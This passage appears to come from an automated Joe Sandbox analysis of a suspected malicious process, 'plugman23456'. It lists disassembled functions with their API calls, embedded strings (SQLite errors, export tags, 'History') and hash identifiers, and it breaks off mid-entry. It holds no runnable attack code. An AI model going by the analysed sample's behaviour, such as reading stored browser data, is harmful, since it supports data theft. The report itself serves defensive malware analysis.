                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2618321458-3614832568
                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004185FC
                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@AttributesFilememset
                          • String ID:
                          • API String ID: 776155459-0
                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                          • malloc.MSVCRT ref: 00417524
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                          • String ID:
                          • API String ID: 2308052813-0
                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PathTemp$??3@
                          • String ID: %s\etilqs_$etilqs_
                          • API String ID: 1589464350-1420421710
                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                          Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040FDD5
                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 0040FE1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                          • String ID: <%s>%s</%s>$</item>$<item>
                          • API String ID: 1775345501-2769808009
                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                          Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                          Download Yara Rule
                          APIs
                          • wcscpy.MSVCRT ref: 0041477F
                          • wcscpy.MSVCRT ref: 0041479A
                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$CloseCreateFileHandle
                          • String ID: General
                          • API String ID: 999786162-26480598
                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLastMessage_snwprintf
                          • String ID: Error$Error %d: %s
                          • API String ID: 313946961-1552265934
                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: foreign key constraint failed$new$oid$old
                          • API String ID: 0-1953309616
                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                          • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 00417497
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                          • malloc.MSVCRT ref: 004174BD
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                          • String ID:
                          • API String ID: 2903831945-0
                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 0040D453
                          • GetWindowRect.USER32(?,?), ref: 0040D460
                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                          • memset.MSVCRT ref: 004450CD
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                          • String ID:
                          • API String ID: 1471605966-0
                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • wcscpy.MSVCRT ref: 0044475F
                          • wcscat.MSVCRT ref: 0044476E
                          • wcscat.MSVCRT ref: 0044477F
                          • wcscat.MSVCRT ref: 0044478E
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                          • String ID: \StringFileInfo\
                          • API String ID: 102104167-2245444037
                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                          Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$??3@
                          • String ID: g4@
                          • API String ID: 3314356048-2133833424
                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _memicmpwcslen
                          • String ID: @@@@$History
                          • API String ID: 1872909662-685208920
                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004100FB
                          • memset.MSVCRT ref: 00410112
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 00410141
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf_wcslwrwcscpy
                          • String ID: </%s>
                          • API String ID: 3400436232-259020660
                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040D58D
                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ChildEnumTextWindowWindowsmemset
                          • String ID: caption
                          • API String ID: 1523050162-4135340389
                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                          • String ID: MS Sans Serif
                          • API String ID: 210187428-168460110
                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                          Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClassName_wcsicmpmemset
                          • String ID: edit
                          • API String ID: 2747424523-2167791130
                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                          Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                          • String ID: SHAutoComplete$shlwapi.dll
                          • API String ID: 3150196962-1506664499
                          • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                          • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memcmp
                          • String ID:
                          • API String ID: 3384217055-0
                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
